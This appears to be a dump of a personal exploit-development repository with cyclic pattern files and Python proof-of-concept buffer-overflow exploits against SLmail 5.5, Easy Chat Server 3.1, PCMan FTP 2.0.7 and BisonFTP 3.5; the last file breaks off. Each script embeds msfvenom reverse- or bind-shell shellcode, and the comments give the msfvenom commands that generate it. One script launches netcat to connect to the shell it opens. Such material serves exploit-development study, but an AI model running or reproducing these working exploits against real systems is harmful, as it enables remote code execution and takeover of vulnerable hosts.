l8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9 2 | -------------------------------------------------------------------------------- /SLmail-5.5-POP3(PASS)/pattern.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9 2 | -------------------------------------------------------------------------------- /SLmail-5.5-POP3(PASS)/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | 6 | ip = "192.168.56.133" 7 | port = 110 8 | global s 9 | 10 | # 3000 crashes the program 11 | # After sending 2606 characters we will reach the EIP location 12 | # JMP ESP 5F4A358F in SLMFC.dll on Win 7 32bit 13 | # Reverse shell payload: 14 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.131 EXITFUNC=thread LPORT=1337 -b '\x00\x0a\x0d' -f c 15 | def connect(): 16 | shellcode = ( 17 | "\xba\xb9\xf7\xc9\x53\xd9\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" 18 | "\x52\x83\xee\xfc\x31\x56\x0e\x03\xef\xf9\x2b\xa6\xf3\xee\x2e" 19 | "\x49\x0b\xef\x4e\xc3\xee\xde\x4e\xb7\x7b\x70\x7f\xb3\x29\x7d" 20 | "\xf4\x91\xd9\xf6\x78\x3e\xee\xbf\x37\x18\xc1\x40\x6b\x58\x40" 21 | "\xc3\x76\x8d\xa2\xfa\xb8\xc0\xa3\x3b\xa4\x29\xf1\x94\xa2\x9c" 22 | "\xe5\x91\xff\x1c\x8e\xea\xee\x24\x73\xba\x11\x04\x22\xb0\x4b" 23 | "\x86\xc5\x15\xe0\x8f\xdd\x7a\xcd\x46\x56\x48\xb9\x58\xbe\x80" 24 | "\x42\xf6\xff\x2c\xb1\x06\x38\x8a\x2a\x7d\x30\xe8\xd7\x86\x87" 25 | "\x92\x03\x02\x13\x34\xc7\xb4\xff\xc4\x04\x22\x74\xca\xe1\x20" 26 | "\xd2\xcf\xf4\xe5\x69\xeb\x7d\x08\xbd\x7d\xc5\x2f\x19\x25\x9d" 27 | "\x4e\x38\x83\x70\x6e\x5a\x6c\x2c\xca\x11\x81\x39\x67\x78\xce" 28 | "\x8e\x4a\x82\x0e\x99\xdd\xf1\x3c\x06\x76\x9d\x0c\xcf\x50\x5a" 29 | "\x72\xfa\x25\xf4\x8d\x05\x56\xdd\x49\x51\x06\x75\x7b\xda\xcd" 30 | "\x85\x84\x0f\x41\xd5\x2a\xe0\x22\x85\x8a\x50\xcb\xcf\x04\x8e" 31 | "\xeb\xf0\xce\xa7\x86\x0b\x99\x07\xfe\x2b\xda\xe0\xfd\x4b\xd9" 32 | "\xc9\x88\xad\x8b\x39\xdd\x66\x24\xa3\x44\xfc\xd5\x2c\x53\x79" 33 | "\xd5\xa7\x50\x7e\x98\x4f\x1c\x6c\x4d\xa0\x6b\xce\xd8\xbf\x41" 34 | "\x66\x86\x52\x0e\x76\xc1\x4e\x99\x21\x86\xa1\xd0\xa7\x3a\x9b" 35 | "\x4a\xd5\xc6\x7d\xb4\x5d\x1d\xbe\x3b\x5c\xd0\xfa\x1f\x4e\x2c" 36 | "\x02\x24\x3a\xe0\x55\xf2\x94\x46\x0c\xb4\x4e\x11\xe3\x1e\x06" 37 | "\xe4\xcf\xa0\x50\xe9\x05\x57\xbc\x58\xf0\x2e\xc3\x55\x94\xa6" 38 | "\xbc\x8b\x04\x48\x17\x08\x24\xab\xbd\x65\xcd\x72\x54\xc4\x90" 39 | "\x84\x83\x0b\xad\x06\x21\xf4\x4a\x16\x40\xf1\x17\x90\xb9\x8b" 40 | "\x08\x75\xbd\x38\x28\x5c") 41 | 42 | data = "\x41" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 40 + shellcode 43 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 44 | s.connect((ip,port)) # Connects to given ip and port by the user 45 | print(s.recv(1024)) # Prints to the screen the data recieved from the server when established the TCP connection 46 | s.send(b'USER hacker\r\n') 47 | print(s.recv(1024)) 48 | print("[%d] bytes has been sended to the target \n" % len(data)) 49 | s.send(bytes('PASS ' + data + '\r\n','latin-1')) # Sends the payload 50 | s.close() 51 | 52 | def main(): 53 | print("----------------------------------------------------------\n") 54 | print("\tProof Of Concept created by N3r0 (2021)\n") 55 | print("----------------------------------------------------------\n") 56 | connect() 57 | print("Check your netcat listener!\n") 58 | 59 | if __name__ == "__main__": 60 | main() 61 | -------------------------------------------------------------------------------- /SEH-Overflow/Easy-Chat-Server-3.1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "192.168.56.132" 6 | port = 80 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | # SEH is being overwritten after sending 220 bytes 10 | # Next SEH is being overwritten after seding 216 bytes 11 | # We can manually calculate NSEH offset by taking SEH offset - 4 bytes = Next SEH offset 12 | # Final Exploit: 13 | # ----------> 14 | # | | 15 | # exploit = junk + nseh + seh + nop + shellcode + padding 16 | # | | 17 | # <-- | 18 | # Bad Chars = \x00\x20 19 | # Reverse payload: 20 | # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.56.131 LPORT=443 -f c -b '\x00\x20' 21 | 22 | shellcode = ( 23 | "\xd9\xc5\xd9\x74\x24\xf4\x5b\xba\x9e\x95\x0f\x37\x31\xc9\xb1" 24 | "\x52\x83\xc3\x04\x31\x53\x13\x03\xcd\x86\xed\xc2\x0d\x40\x73" 25 | "\x2c\xed\x91\x14\xa4\x08\xa0\x14\xd2\x59\x93\xa4\x90\x0f\x18" 26 | "\x4e\xf4\xbb\xab\x22\xd1\xcc\x1c\x88\x07\xe3\x9d\xa1\x74\x62" 27 | "\x1e\xb8\xa8\x44\x1f\x73\xbd\x85\x58\x6e\x4c\xd7\x31\xe4\xe3" 28 | "\xc7\x36\xb0\x3f\x6c\x04\x54\x38\x91\xdd\x57\x69\x04\x55\x0e" 29 | "\xa9\xa7\xba\x3a\xe0\xbf\xdf\x07\xba\x34\x2b\xf3\x3d\x9c\x65" 30 | "\xfc\x92\xe1\x49\x0f\xea\x26\x6d\xf0\x99\x5e\x8d\x8d\x99\xa5" 31 | "\xef\x49\x2f\x3d\x57\x19\x97\x99\x69\xce\x4e\x6a\x65\xbb\x05" 32 | "\x34\x6a\x3a\xc9\x4f\x96\xb7\xec\x9f\x1e\x83\xca\x3b\x7a\x57" 33 | "\x72\x1a\x26\x36\x8b\x7c\x89\xe7\x29\xf7\x24\xf3\x43\x5a\x21" 34 | "\x30\x6e\x64\xb1\x5e\xf9\x17\x83\xc1\x51\xbf\xaf\x8a\x7f\x38" 35 | "\xcf\xa0\x38\xd6\x2e\x4b\x39\xff\xf4\x1f\x69\x97\xdd\x1f\xe2" 36 | "\x67\xe1\xf5\xa5\x37\x4d\xa6\x05\xe7\x2d\x16\xee\xed\xa1\x49" 37 | "\x0e\x0e\x68\xe2\xa5\xf5\xfb\xcd\x92\xcd\x78\xa5\xe0\x2d\x7e" 38 | "\x8d\x6c\xcb\xea\xe1\x38\x44\x83\x98\x60\x1e\x32\x64\xbf\x5b" 39 | "\x74\xee\x4c\x9c\x3b\x07\x38\x8e\xac\xe7\x77\xec\x7b\xf7\xad" 40 | "\x98\xe0\x6a\x2a\x58\x6e\x97\xe5\x0f\x27\x69\xfc\xc5\xd5\xd0" 41 | "\x56\xfb\x27\x84\x91\xbf\xf3\x75\x1f\x3e\x71\xc1\x3b\x50\x4f" 42 | "\xca\x07\x04\x1f\x9d\xd1\xf2\xd9\x77\x90\xac\xb3\x24\x7a\x38" 43 | "\x45\x07\xbd\x3e\x4a\x42\x4b\xde\xfb\x3b\x0a\xe1\x34\xac\x9a" 44 | "\x9a\x28\x4c\x64\x71\xe9\x6c\x87\x53\x04\x05\x1e\x36\xa5\x48" 45 | "\xa1\xed\xea\x74\x22\x07\x93\x82\x3a\x62\x96\xcf\xfc\x9f\xea" 46 | "\x40\x69\x9f\x59\x60\xb8") 47 | 48 | junk = '\x41' * 216 # This should reach NSEH 49 | nseh = '\xeb\x0a\x90\x90' # JMP ten bytes 50 | seh = '\x6d\x8a\x01\x10' # (10018A6D) POP ESI POP ECX RETN in SSLEAY.dll XP SP3 51 | nop = '\x90' * 16 52 | padding = '\x44' * (2000 - len(shellcode) - 224 - 16) 53 | 54 | buf = junk + nseh + seh + nop + shellcode + padding 55 | request = "GET /chat.ghp?username=" + buf + "&password=12345" + "&room=1&sex=1 HTTP/1.1\r\n" # Request intercepted using burpsuite 56 | request += "Host: 127.0.0.1\r\n" 57 | s.connect((ip,port)) 58 | request += "\r\n\r\n" 59 | s.send(bytes(request,'latin-1')) 60 | print("%d bytes has been sent to the target \n" % len(request)) 61 | s.close() 62 | 63 | -------------------------------------------------------------------------------- /PCMan-FTP-Server-2.0.7/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | 6 | global s 7 | # 6200 crashes the program 8 | # After sending 2007 characters we will reach the EIP location 9 | # JMP ESP = 7CB32D69 in SHELL32.dll Windows XP SP3 32bit 10 | # Bad characters = \x00\x0a\x0d\xff 11 | # Reverse shell payload: 12 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.131 EXITFUNC=thread LPORT=53 -b '\x00\x0a\x0d\xff' -f python 13 | def connect(): 14 | shellcode = "" 15 | shellcode += "\xbd\x09\x50\xda\x96\xdb\xcd\xd9\x74\x24\xf4" 16 | shellcode += "\x5a\x2b\xc9\xb1\x52\x83\xea\xfc\x31\x6a\x0e" 17 | shellcode += "\x03\x63\x5e\x38\x63\x8f\xb6\x3e\x8c\x6f\x47" 18 | shellcode += "\x5f\x04\x8a\x76\x5f\x72\xdf\x29\x6f\xf0\x8d" 19 | shellcode += "\xc5\x04\x54\x25\x5d\x68\x71\x4a\xd6\xc7\xa7" 20 | shellcode += "\x65\xe7\x74\x9b\xe4\x6b\x87\xc8\xc6\x52\x48" 21 | shellcode += "\x1d\x07\x92\xb5\xec\x55\x4b\xb1\x43\x49\xf8" 22 | shellcode += "\x8f\x5f\xe2\xb2\x1e\xd8\x17\x02\x20\xc9\x86" 23 | shellcode += "\x18\x7b\xc9\x29\xcc\xf7\x40\x31\x11\x3d\x1a" 24 | shellcode += "\xca\xe1\xc9\x9d\x1a\x38\x31\x31\x63\xf4\xc0" 25 | shellcode += "\x4b\xa4\x33\x3b\x3e\xdc\x47\xc6\x39\x1b\x35" 26 | shellcode += "\x1c\xcf\xbf\x9d\xd7\x77\x1b\x1f\x3b\xe1\xe8" 27 | shellcode += "\x13\xf0\x65\xb6\x37\x07\xa9\xcd\x4c\x8c\x4c" 28 | shellcode += "\x01\xc5\xd6\x6a\x85\x8d\x8d\x13\x9c\x6b\x63" 29 | shellcode += "\x2b\xfe\xd3\xdc\x89\x75\xf9\x09\xa0\xd4\x96" 30 | shellcode += "\xfe\x89\xe6\x66\x69\x99\x95\x54\x36\x31\x31" 31 | shellcode += "\xd5\xbf\x9f\xc6\x1a\xea\x58\x58\xe5\x15\x99" 32 | shellcode += "\x71\x22\x41\xc9\xe9\x83\xea\x82\xe9\x2c\x3f" 33 | shellcode += "\x04\xb9\x82\x90\xe5\x69\x63\x41\x8e\x63\x6c" 34 | shellcode += "\xbe\xae\x8c\xa6\xd7\x45\x77\x21\x18\x31\x4f" 35 | shellcode += "\x32\xf0\x40\xaf\x34\x34\xcc\x49\x5e\x26\x98" 36 | shellcode += "\xc2\xf7\xdf\x81\x98\x66\x1f\x1c\xe5\xa9\xab" 37 | shellcode += "\x93\x1a\x67\x5c\xd9\x08\x10\xac\x94\x72\xb7" 38 | shellcode += "\xb3\x02\x1a\x5b\x21\xc9\xda\x12\x5a\x46\x8d" 39 | shellcode += "\x73\xac\x9f\x5b\x6e\x97\x09\x79\x73\x41\x71" 40 | shellcode += "\x39\xa8\xb2\x7c\xc0\x3d\x8e\x5a\xd2\xfb\x0f" 41 | shellcode += "\xe7\x86\x53\x46\xb1\x70\x12\x30\x73\x2a\xcc" 42 | shellcode += "\xef\xdd\xba\x89\xc3\xdd\xbc\x95\x09\xa8\x20" 43 | shellcode += "\x27\xe4\xed\x5f\x88\x60\xfa\x18\xf4\x10\x05" 44 | shellcode += "\xf3\xbc\x31\xe4\xd1\xc8\xd9\xb1\xb0\x70\x84" 45 | shellcode += "\x41\x6f\xb6\xb1\xc1\x85\x47\x46\xd9\xec\x42" 46 | shellcode += "\x02\x5d\x1d\x3f\x1b\x08\x21\xec\x1c\x19" 47 | 48 | EIP = "\x69\x2d\xb3\x7c" 49 | nops = "\x90" * 20 50 | data = "\x41" * 2007 + EIP + nops + shellcode 51 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 52 | s.connect((sys.argv[1],int(sys.argv[2]))) # Connects to given ip and port by the user (E.g python3 exploit.py 192.168.45.134 21) 53 | print(s.recv(1024)) # Prints to the screen the data recieved from the server when established the TCP connection 54 | s.send(bytes(data,'latin-1')) # Sends the payload 55 | print("%d bytes has been sended to the target \n" % len(data)) 56 | s.close() 57 | 58 | def main(): 59 | print("----------------------------------------------------------\n") 60 | print("\tProof Of Concept created by N3r0 (2021)\n") 61 | print("----------------------------------------------------------\n") 62 | connect() 63 | print("Check your netcat listener!\n") 64 | 65 | if __name__ == "__main__": 66 | main() 67 | -------------------------------------------------------------------------------- /Egg-Hunter/BisonFTP-Server-3.5/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | import os 6 | import time 7 | 8 | ip = "192.168.56.132" 9 | port = 21 10 | 11 | #EIP overwritten after 1063 bytes 12 | # JMP EBX (7C8192BA) address in module kernel32.dll 13 | # bad chars = \x00\x0a\x0d\xff 14 | # Msfvenom payload: 15 | # msfvenom -p windows/shell_bind_tcp EXITFUNC=thread LPORT=1337 -f c -b '\x00\x0a\x0d\xff' 16 | # 355 bytes 17 | # Egghunter , tag n00b : 18 | # "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 19 | # "\xef\xb8\x6e\x30\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 20 | # Put this tag in front of your shellcode : n00bn00b 21 | 22 | egghunter = ( 23 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 24 | "\xef\xb8\x6e\x30\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 25 | 26 | shellcode = ("n00bn00b" + 27 | "\xdb\xcf\xd9\x74\x24\xf4\xb8\x58\x2a\x25\xc5\x5e\x31\xc9\xb1" 28 | "\x53\x31\x46\x17\x03\x46\x17\x83\xb6\xd6\xc7\x30\xba\xcf\x8a" 29 | "\xbb\x42\x10\xeb\x32\xa7\x21\x2b\x20\xac\x12\x9b\x22\xe0\x9e" 30 | "\x50\x66\x10\x14\x14\xaf\x17\x9d\x93\x89\x16\x1e\x8f\xea\x39" 31 | "\x9c\xd2\x3e\x99\x9d\x1c\x33\xd8\xda\x41\xbe\x88\xb3\x0e\x6d" 32 | "\x3c\xb7\x5b\xae\xb7\x8b\x4a\xb6\x24\x5b\x6c\x97\xfb\xd7\x37" 33 | "\x37\xfa\x34\x4c\x7e\xe4\x59\x69\xc8\x9f\xaa\x05\xcb\x49\xe3" 34 | "\xe6\x60\xb4\xcb\x14\x78\xf1\xec\xc6\x0f\x0b\x0f\x7a\x08\xc8" 35 | "\x6d\xa0\x9d\xca\xd6\x23\x05\x36\xe6\xe0\xd0\xbd\xe4\x4d\x96" 36 | "\x99\xe8\x50\x7b\x92\x15\xd8\x7a\x74\x9c\x9a\x58\x50\xc4\x79" 37 | "\xc0\xc1\xa0\x2c\xfd\x11\x0b\x90\x5b\x5a\xa6\xc5\xd1\x01\xaf" 38 | "\x2a\xd8\xb9\x2f\x25\x6b\xca\x1d\xea\xc7\x44\x2e\x63\xce\x93" 39 | "\x51\x5e\xb6\x0b\xac\x61\xc7\x02\x6b\x35\x97\x3c\x5a\x36\x7c" 40 | "\xbc\x63\xe3\xe9\xb4\xc2\x5c\x0c\x39\xb4\x0c\x90\x91\x5d\x47" 41 | "\x1f\xce\x7e\x68\xf5\x67\x16\x95\xf6\x82\xde\x10\x10\xe6\x30" 42 | "\x75\x8a\x9e\xf2\xa2\x03\x39\x0c\x81\x3b\xad\x45\xc3\xfc\xd2" 43 | "\x55\xc1\xaa\x44\xde\x06\x6f\x75\xe1\x02\xc7\xe2\x76\xd8\x86" 44 | "\x41\xe6\xdd\x82\x31\x8b\x4c\x49\xc1\xc2\x6c\xc6\x96\x83\x43" 45 | "\x1f\x72\x3e\xfd\x89\x60\xc3\x9b\xf2\x20\x18\x58\xfc\xa9\xed" 46 | "\xe4\xda\xb9\x2b\xe4\x66\xed\xe3\xb3\x30\x5b\x42\x6a\xf3\x35" 47 | "\x1c\xc1\x5d\xd1\xd9\x29\x5e\xa7\xe5\x67\x28\x47\x57\xde\x6d" 48 | "\x78\x58\xb6\x79\x01\x84\x26\x85\xd8\x0c\x46\x64\xc8\x78\xef" 49 | "\x31\x99\xc0\x72\xc2\x74\x06\x8b\x41\x7c\xf7\x68\x59\xf5\xf2" 50 | "\x35\xdd\xe6\x8e\x26\x88\x08\x3c\x46\x99") 51 | 52 | def exploit_faze(): 53 | exploit = shellcode + '\x90' * (1063 - (len(shellcode) + len(egghunter))) + egghunter + '\xBA\x92\x81\x7C' + '\x90' * 205 54 | 55 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 56 | s.connect((ip,port)) 57 | print(s.recv(1024)) 58 | time.sleep(5) 59 | s.recv(2000) 60 | s.send(b'USER anonymous\r\n') 61 | print(s.recv(2000)) 62 | s.send(b'PASS anonymous\r\n') 63 | print(s.recv(2000)) 64 | s.send(bytes('ABOR ' + exploit + '\r\n','latin-1')) 65 | print("Exploit length is [%d] bytes\n" % len(exploit)) 66 | s.close() 67 | print("--------------------------------------------------------------------\n") 68 | print("Executing Exploit...\n") 69 | print("You should be able to connect to the target on port 1337 in 10 sec\n") 70 | print("--------------------------------------------------------------------\n") 71 | time.sleep(10) 72 | os.system("nc -n " + ip + " 1337") 73 | 74 | def main(): 75 | print("--------------------------------------------------------------------\n") 76 | print("\t\t Proof Of Concept by N3R0 (2020)\n") 77 | print("--------------------------------------------------------------------\n") 78 | exploit_faze() 79 | 80 | main() 81 | -------------------------------------------------------------------------------- /Egg-Hunter/BisonFTP-Server-3.5/staged_exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import sys 5 | import os 6 | import time 7 | 8 | ip = "192.168.56.132" 9 | port = 21 10 | 11 | #EIP overwritten after 1063 bytes 12 | # JMP EBX (7C8192BA) address in module kernel32.dll 13 | # bad chars = \x00\x0a\x0d\xff 14 | # Msfvenom payload: 15 | # msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=192.168.56.131 LPORT=53 -f c -b '\x00\x0d\x0a\xff' 16 | # 402 bytes 17 | # Egghunter , tag n00b : 18 | # "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 19 | # "\xef\xb8\x6e\x30\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 20 | # Put this tag in front of your shellcode : n00bn00b 21 | 22 | egghunter = ( 23 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 24 | 